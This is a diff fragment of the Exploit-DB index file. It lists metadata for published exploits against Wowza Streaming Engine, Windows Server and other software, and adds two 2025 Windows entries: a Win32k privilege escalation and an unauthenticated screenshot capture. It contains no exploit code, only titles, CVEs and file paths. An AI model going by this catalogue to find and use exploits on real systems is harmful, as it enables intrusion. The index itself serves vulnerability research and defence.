 37573,exploits/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",webapps,multiple,,2012-08-06,2015-07-11,1,,,,,,https://www.securityfocus.com/bid/54812/info
 40134,exploits/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php
 40135,exploits/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php
@@ -41375,6 +41380,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 6705,exploits/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation",2008-10-08,"Cesar Cerrudo",local,windows,,2008-10-07,2018-12-18,1,,,2008-Churrasco.zip,,,
 35936,exploits/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)",2015-01-29,KoreLogic,local,windows,,2015-01-29,2015-01-29,0,CVE-2014-4076;OSVDB-114532;MS14-070,,,,,
 37755,exploits/windows/local/37755.c,"Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",local,windows,,2015-08-15,2016-10-27,0,CVE-2014-4076;OSVDB-114532;MS14-070,,,http://www.exploit-db.com/screenshots/idlt38000/ms14-070.jpg,,
+52301,exploits/windows/local/52301.c,"Microsoft Windows Server 2016 - Win32k Elevation of Privilege",2025-05-25,"Milad karimi",local,windows,,2025-05-25,2025-05-25,0,CVE-2023-29336,,,,,
 43962,exploits/windows/local/43962.c,"Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation",2018-02-02,"Saar Amar",local,windows,,2018-02-02,2018-02-02,1,CVE-2018-0743,Local,,,,https://raw.githubusercontent.com/saaramar/execve_exploit/master/exploit.c
 353,exploits/windows/local/353.c,"Microsoft Windows Task Scheduler (XP/2000) - '.job' (MS04-022)",2004-07-18,anonymous,local,windows,,2004-07-17,2019-03-28,1,OSVDB-7798;CVE-2004-0212;MS04-022,,,,,
 38200,exploits/windows/local/38200.txt,"Microsoft Windows Task Scheduler - 'DeleteExpiredTaskAfter' File Deletion Privilege Escalation",2015-09-15,"Google Security Research",local,windows,,2015-09-15,2015-09-15,1,CVE-2015-2525;OSVDB-127204,,,,,https://code.google.com/p/google-security-research/issues/detail?id=442
@@ -45934,6 +45940,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41073,exploits/windows/remote/41073.py,"WinaXe Plus 8.7 - Remote Buffer Overflow",2017-01-16,"Peter Baris",remote,windows,,2017-01-16,2017-01-16,1,,,,http://www.exploit-db.com/screenshots/idlt41500/screen-shot-2017-01-16-at-152056.png,http://www.exploit-db.comwinaxep.exe,
 16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,,
 51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,,
+52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
 30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,remote,windows,,2007-06-11,2013-12-10,1,CVE-2007-3201;OSVDB-41727,,,,,https://www.securityfocus.com/bid/24412/info
 16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-0348;OSVDB-34315,"Metasploit Framework (MSF)",,,,
 7875,exploits/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow",2009-01-26,"joe walko",remote,windows,21,2009-01-25,2016-09-27,1,OSVDB-51667;CVE-2009-0351,,,,,